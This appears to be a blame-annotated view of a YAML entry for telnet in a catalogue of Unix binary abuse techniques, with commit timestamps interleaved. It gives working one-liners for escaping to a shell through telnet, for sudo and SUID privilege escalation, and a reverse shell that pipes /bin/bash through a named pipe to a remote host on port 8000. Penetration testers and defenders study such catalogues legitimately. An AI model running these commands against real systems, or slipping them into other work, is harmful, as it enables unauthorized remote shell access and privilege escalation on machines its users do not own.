2018-05-21 21:14:41 +02:00
|
|
|
---
|
|
|
|
functions:
|
|
|
|
exec-interactive:
|
2018-05-22 22:26:17 +02:00
|
|
|
- description: BSD version only.
|
|
|
|
code: |
|
2018-05-21 21:14:41 +02:00
|
|
|
RHOST=www.google.com
|
|
|
|
RPORT=80
|
|
|
|
telnet $RHOST $RPORT
|
|
|
|
^]
|
|
|
|
!/bin/sh
|
|
|
|
reverse-shell:
|
2018-05-22 22:22:20 +02:00
|
|
|
- description: Run `nc -l -p 8000` to receive the shell on the other end.
|
|
|
|
code: |
|
|
|
|
RHOST=10.0.0.1
|
2018-05-21 21:14:41 +02:00
|
|
|
RPORT=8000
|
|
|
|
TF=$(mktemp)
|
|
|
|
rm $TF
|
|
|
|
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
|
|
|
|
sudo-enabled:
|
2018-05-22 22:26:17 +02:00
|
|
|
- description: BSD version only.
|
|
|
|
code: |
|
2018-05-21 21:14:41 +02:00
|
|
|
RHOST=www.google.com
|
|
|
|
RPORT=80
|
|
|
|
sudo telnet $RHOST $RPORT
|
|
|
|
^]
|
|
|
|
!/bin/sh
|
|
|
|
suid-limited:
|
2018-05-22 22:26:17 +02:00
|
|
|
- description: BSD version only.
|
|
|
|
code: |
|
2018-05-21 21:14:41 +02:00
|
|
|
RHOST=www.google.com
|
|
|
|
RPORT=80
|
|
|
|
./telnet $RHOST $RPORT
|
|
|
|
^]
|
|
|
|
!/bin/sh
|
2018-05-22 22:26:17 +02:00
|
|
|
|
2018-05-21 21:14:41 +02:00
|
|
|
---
|